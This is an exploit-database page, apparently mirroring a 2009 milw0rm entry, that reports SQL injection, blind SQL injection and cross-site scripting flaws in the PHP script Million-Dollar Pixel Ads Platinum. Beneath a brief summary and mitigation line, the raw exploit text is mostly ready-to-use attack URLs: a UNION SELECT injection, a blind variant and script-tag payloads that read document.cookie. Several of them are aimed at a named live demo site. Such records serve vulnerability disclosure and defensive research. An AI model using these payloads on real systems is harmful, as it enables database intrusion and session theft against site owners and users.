header-logo
Suggest Exploit
vendor:
Million-Dollar Pixel Ads Platinum
by:
Moudi
5.5
CVSS
MEDIUM
SQL Injection and Blind SQL
CWE
Product Name: Million-Dollar Pixel Ads Platinum
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Million-Dollar Pixel Ads Platinum Multiple Remote Vulnerabilities

The Million-Dollar Pixel Ads Platinum script is vulnerable to SQL Injection and Blind SQL vulnerabilities. These vulnerabilities allow an attacker to manipulate SQL queries and potentially access or modify the database.

Mitigation:

The vendor has not provided any specific mitigation steps. It is recommended to update to a patched version or implement proper input validation to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Million-Dollar Pixel Ads Platinum Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Million-Dollar Pixel Ads Platinum ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.turnkeysetup.net/details_million-platinum.php  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $447.97 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[SQL]&submit=search

[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1+union+select+version()--&submit=search

===[ Exploit + LIVE : BLIND SQL vulnerability ]===

[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[BLIND]

[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1 and 1=1+union+select+version()--&submit=search

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/buy1.php?category=11&place=[XSS]
[»] http://www.site.com/patch/index2.php?category=[XSS]
[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[XSS]

[»] http://www.turnkeysetup.net/demos/million/buy1.php?category=11&place="><script>alert(document.cookie);</script>
[»] http://www.turnkeysetup.net/demos/million/index2.php?category="><script>alert(document.cookie);</script>
[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory="><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR